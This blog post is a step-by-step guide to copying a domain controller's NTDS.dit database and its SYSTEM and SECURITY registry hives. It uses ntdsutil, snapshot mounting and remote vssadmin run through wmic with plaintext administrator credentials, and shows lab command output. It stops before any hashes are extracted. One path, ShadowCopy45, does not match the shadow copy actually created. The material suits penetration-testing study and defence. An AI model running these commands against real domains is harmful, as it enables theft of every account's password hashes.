Obtaining Domain Controller Password Hashes

I have referred to the following bookmarked URL in the past as a reminder on how to easily obtain the NTDS.dit and SYSTEM registry for analysis.
Obtaining NTDS.Dit Using In-Built Windows Commands
https://www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html
I revisit this URL and document additional ways to obtain NTDS.dit and the Windows Registry files but also how to extract the password hashes. Additional methods on obtaining the password hashes from the Domain Controller will also be listed.

One item I would change about the commands provided is I would combine them to run as one long command


C:\ntdsutil “activate instance ntds” ifm “create full c:\temp” quit quit

This would place a backup of the NTDS.dit and the SYSTEM and SECURITY registry files in C:\temp\Active Directory and C:\temp\registry

From this bookmark I will document all the ways I have obtained the password hashes from a Domain Controller.
More ntdsutil
You can use ntdsutil to determine if there has been a previous snapshot created. If a snapshot exists then the shadow volume can be mounted and the NTDS.dit and registry files copied.

C:\Users\Administrator>ntdsutil snapshot "list all"
ntdsutil: snapshot
snapshot: list all
 1: 2019/01/02:21:40 {ff29f1b4-5dac-41cd-a592-10c553595a95}
 2:   C: {29e45139-0e71-47eb-a48f-2e6848d05908}
Lets query the registry to identify where NTDS.dit is located. Then mount the snapshot and copy NTDS.dit and the system’s registry files.
C:\Users\Administrator>reg query hklm\system\currentcontrolset\services\ntds\parameters

HKEY_LOCAL_MACHINE\system\currentcontrolset\services\ntds\parameters
. . . SNIP . . .
Name,CN=Sites,CN=Configuration,DC=corp,DC=jedge,DC=com
    DsaOptions    REG_SZ    1
    DSA Working Directory    REG_SZ    C:\Windows\NTDS
    DSA Database file    REG_SZ    C:\Windows\NTDS\ntds.dit
    Database backup path    REG_SZ    C:\Windows\NTDS\dsadata.bak
. . . SNIP . . .

C:\Users\Administrator>ntdsutil snapshot "mount {29e45139-0e71-47eb-a48f-2e6848d05908}"
ntdsutil: snapshot
snapshot: mount {29e45139-0e71-47eb-a48f-2e6848d05908}
Snapshot {29e45139-0e71-47eb-a48f-2e6848d05908} mounted as C:\$SNAP_201901022140_VOLUMEC$\

C:\Users\Administrator>copy C:\$SNAP_201901022140_VOLUMEC$\Windows\NTDS\ntds.dit c:\temp\ntds.dit
        1 file(s) copied.

C:\Users\Administrator>copy C:\$SNAP_201901022140_VOLUMEC$\Windows\System32\Config\SYSTEM c:\temp\SYSTEM
        1 file(s) copied.

C:\Users\Administrator>copy C:\$SNAP_201901022140_VOLUMEC$\Windows\System32\Config\SECURITY c:\temp\SECURITY
        1 file(s) copied.

VSSADMIN over WMIC

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/vssadmin
https://docs.microsoft.com/en-us/windows/desktop/wmisdk/wmic
We will need to read the output of the WMIC commands and access the files we copy from the shadow volumn so we mount the Domain Controller hard disk and create a temp folder.

C:\Users\Administrator>net use \\192.168.50.10\C$ "Password5" /u:CORP\administrator
The command completed successfully.

C:\Users\Administrator>mkdir \\192.168.50.10\C$\temp
A subdirectory or file \\192.168.50.10\C$\temp already exists.

We use the WMIC command to identify any existing shadow volumns or create our own so we can copy the NTDS.dit and registry files to the temp folder where we can transfer them to our workstation.
C:\Users\Administrator>wmic /node:192.168.50.10 /user:CORP\Administrator /password:Password5 process call create "cmd /c vssadmin list shadows 2>&1 > C:\temp\checkshadow.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 2568;
        ReturnValue = 0;
};

C:\Users\Administrator>type \\192.168.50.10\C$\temp\checkshadow.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Contents of shadow copy set ID: {ff29f1b4-5dac-41cd-a592-10c553595a95}
   Contained 1 shadow copies at creation time: 1/2/2019 9:40:13 PM
      Shadow Copy ID: {29e45139-0e71-47eb-a48f-2e6848d05908}
         Original Volume: (C:)\\?\Volume{874968c4-ed3a-11e6-bee8-806e6f6e6963}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: WIN-PJ59SLGOBUG.corp.jedge.com
         Service Machine: WIN-PJ59SLGOBUG.corp.jedge.com
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ApplicationRollback
         Attributes: Persistent, No auto release, Differential, Exposed locally,
 Auto recovered
We have a recent shadow file. If we did not have a file we would use vssadmin to create one.
C:\Users\Administrator>wmic /node:192.168.50.10 /user:CORP\Administrator /password:Password5 process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 2564;
        ReturnValue = 0;
};

C:\Users\Administrator>type \\192.168.50.10\C$\temp\output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {3a6b62ff-3e5c-4b86-868c-2e26355d490a}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
We will work with the latest shadow volumn we just created. We will copy the files to the C:\temp folder which we have already mounted on the attacking host. From there we can copy them to the host for analysis.
C:\Users\Administrator>wmic /node:192.168.50.10 /user:CORP\Administrator /password:Password5 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1 > C:\temp\output.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 1248;
        ReturnValue = 0;
};

C:\Users\Administrator>wmic /node:192.168.50.10 /user:CORP\Administrator /password:Password5 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SECURITY C:\temp\SECURITY.hive 2>&1 > C:\temp\output.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 232;
        ReturnValue = 0;
};

C:\Users\Administrator>wmic /node:192.168.50.10 /user:CORP\Administrator /password:Password5 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy45\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt"

Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 1804;
        ReturnValue = 0;
};

C:\Users\Administrator>dir \\192.168.50.10\C$\temp
 Volume in drive \\192.168.50.10\C$ has no label.
 Volume Serial Number is 54AC-A84F

 Directory of \\192.168.50.10\C$\temp

01/07/2019  02:15 PM    <DIR>          .
01/07/2019  02:15 PM    <DIR>          ..
01/07/2019  01:57 PM               801 checkshadow.txt
01/02/2019  09:40 PM        16,793,600 ntds.dit
01/07/2019  02:14 PM                44 output.txt
01/03/2019  05:56 PM           262,144 SECURITY.hive
01/07/2019  02:05 PM         8,650,752 SYSTEM.hive
               5 File(s)     25,707,341 bytes
               2 Dir(s)  12,779,933,696 bytes free

to be continued . . .

Twitter
Follow by Email
LinkedIn
YouTube
Google+
RSS

Leave a Reply

Your email address will not be published. Required fields are marked *

 

This site uses Akismet to reduce spam. Learn how your comment data is processed.